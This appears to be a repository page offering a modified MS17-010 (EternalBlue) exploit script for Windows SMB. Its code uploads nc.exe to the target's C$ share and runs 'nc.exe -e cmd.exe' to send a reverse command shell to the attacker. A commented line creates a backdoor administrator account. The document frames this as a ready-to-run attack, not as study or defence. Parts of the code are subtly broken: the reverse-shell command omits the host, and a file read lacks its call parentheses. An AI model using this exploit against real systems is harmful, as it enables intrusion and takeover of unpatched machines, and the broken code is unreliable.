
Run MS17-010 modified exploit to get reverse nc connection

Primary LanguagePython


Run MS17-010 modified exploit to get reverse nc connection

Original: https://github.com/worawit/MS17-010

Change LHOST and LPORT. This is your IP address and port where you are listening.
nc.exe is in same folder where you saved the script.

Modified Code

def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() #print('creating file c:\pwned.txt on the target') tid2 = smbConn.connectTree('C$') #fid2 = smbConn.createFile(tid2, '/pwned.txt') #smbConn.closeFile(tid2, fid2) #smbConn.disconnectTree(tid2)

#smb_send_file(smbConn, 'Full path of nc in local', 'C', '/nc.exe')
smb_send_file(smbConn, 'nc.exe', 'C', '/nc.exe')
#service_exec(conn, r'cmd /c net user temp temp123 /add && net localgroup administrators temp /add')
print "check your nc...for reverse connection...."
#service_exec(conn, r'cmd /c c:\\nc.exe -e cmd.exe LHOST LPORT')
service_exec(conn, r'cmd /c c:\\nc.exe -e cmd.exe 3333')

# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."

def smb_send_file(smbConn, localSrc, remoteDrive, remotePath): with open(localSrc, 'rb') as fp: smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

POC: https://giant.gfycat.com/HappygoluckyEdibleHummingbird.webm